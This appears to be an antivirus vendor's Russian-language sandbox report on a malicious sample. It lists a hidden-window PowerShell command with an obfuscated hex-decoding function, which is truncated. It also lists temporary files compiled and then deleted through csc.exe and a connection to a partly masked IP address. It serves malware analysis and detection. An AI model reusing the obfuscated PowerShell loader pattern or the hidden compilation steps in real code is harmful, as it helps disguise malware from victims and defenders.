Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function ge8cfdf {param($hf7cf8)$m96c38d='ebf515f';$g2f46ff='';for ($i=0; $i -lt $hf7cf8.length;$i+=2){$va618=[convert]::ToByte($hf7cf8.Substring($i,2),16);$g2f46ff+=[char...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\_0e5cpyn.0.cs
- %TEMP%\_0e5cpyn.cmdline
- %TEMP%\_0e5cpyn.out
- %TEMP%\csc4b05.tmp
- %TEMP%\res4b06.tmp
- %TEMP%\_0e5cpyn.dll
Удаляет следующие файлы
- %TEMP%\res4b06.tmp
- %TEMP%\csc4b05.tmp
- %TEMP%\_0e5cpyn.pdb
- %TEMP%\_0e5cpyn.out
- %TEMP%\_0e5cpyn.dll
- %TEMP%\_0e5cpyn.0.cs
- %TEMP%\_0e5cpyn.cmdline
Сетевая активность
Подключается к
- '34.##.96.249':80
Другое
Создает и запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\_0e5cpyn.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4B06.tmp" "%TEMP%\CSC4B05.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\_0e5cpyn.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4B06.tmp" "%TEMP%\CSC4B05.tmp"
